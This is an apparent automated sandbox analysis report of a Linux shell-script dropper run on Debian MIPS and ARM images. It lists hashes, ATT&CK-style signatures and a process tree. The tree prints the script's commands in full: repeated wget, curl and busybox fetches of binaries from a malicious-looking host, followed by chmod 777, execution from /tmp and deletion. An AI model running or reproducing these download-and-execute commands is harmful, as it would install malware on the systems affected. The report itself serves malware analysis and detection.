Analysis
-
max time kernel
150s -
max time network
45s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10-11-2024 01:01
Static task
static1
Behavioral task
behavioral1
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
-
Size
10KB
-
MD5
2408085a258a318bc587e649a5e777ad
-
SHA1
7d4f24886ae9a4e5b0a1ee3866a311e53a29506d
-
SHA256
208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537
-
SHA512
5f9ddc2e0b28f44731c0d27db88455b7154293933a0aaf1d0096344f618fe40fbd5ff45ef4a56ba2a17d8e77f6de838690f88856fdbaaea0ff16dd63183bb7fa
-
SSDEEP
192:Iw+LtUc+r7f932KtEsj+nmtUc+r7f62KtEsU8:Iw+eHp+nJ18
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 892 chmod 743 chmod 816 chmod 827 chmod 864 chmod 878 chmod 750 chmod 765 chmod 804 chmod 871 chmod 885 chmod -
Executes dropped EXE 11 IoCs
Processes:
d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0JV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRpgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3yioc pid process /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 744 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 751 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 766 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 805 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 817 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 829 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 865 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 872 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 879 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 886 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 893 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 35 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxcurlwgetcurlbusyboxwgetbusyboxbusyboxcurlcurlwgetbusyboxcurlbusyboxbusyboxwgetbusyboxwgetwgetwgetcurlbusyboxwgetwgetwgetcurlbusyboxwgetcurlwgetcurlcurlbusyboxcurlcurlpid process 815 busybox 821 curl 881 wget 882 curl 870 busybox 874 wget 877 busybox 884 busybox 754 curl 781 curl 820 wget 891 busybox 734 curl 749 busybox 758 busybox 771 wget 795 busybox 867 wget 721 wget 811 wget 853 curl 863 busybox 895 wget 753 wget 833 wget 875 curl 742 busybox 746 wget 747 curl 888 wget 896 curl 813 curl 823 busybox 868 curl 889 curl -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl
Processes
-
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:721 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:734 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- System Network Configuration Discovery
PID:742 -
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:743 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:744 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:745
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:746 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:747 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- System Network Configuration Discovery
PID:749 -
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:750 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:751 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:752
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:753 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:754 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- System Network Configuration Discovery
PID:758 -
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:765 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:766 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:769
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:771 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:781 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- System Network Configuration Discovery
PID:795 -
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:804 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:805 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:809
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:811 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:813 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- System Network Configuration Discovery
PID:815 -
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:816 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:817 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:819
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:820 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:821 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- System Network Configuration Discovery
PID:823 -
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:827 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:829 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:831
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:833 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- System Network Configuration Discovery
PID:863 -
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:864 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:865 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:866
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:867 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:868 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- System Network Configuration Discovery
PID:870 -
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:871 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:872 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:873
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:874 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:875 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- System Network Configuration Discovery
PID:877 -
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:878 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:879 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:880
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:881 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- System Network Configuration Discovery
PID:884 -
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:885 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:886 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:887
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:888 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:889 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- System Network Configuration Discovery
PID:891 -
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:892 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:893 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:894
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- System Network Configuration Discovery
PID:895 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97
-
Filesize
176B
MD5e1732e70f015e99d14dff1eeeaec9966
SHA1c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113
SHA2566de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e
SHA5126ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7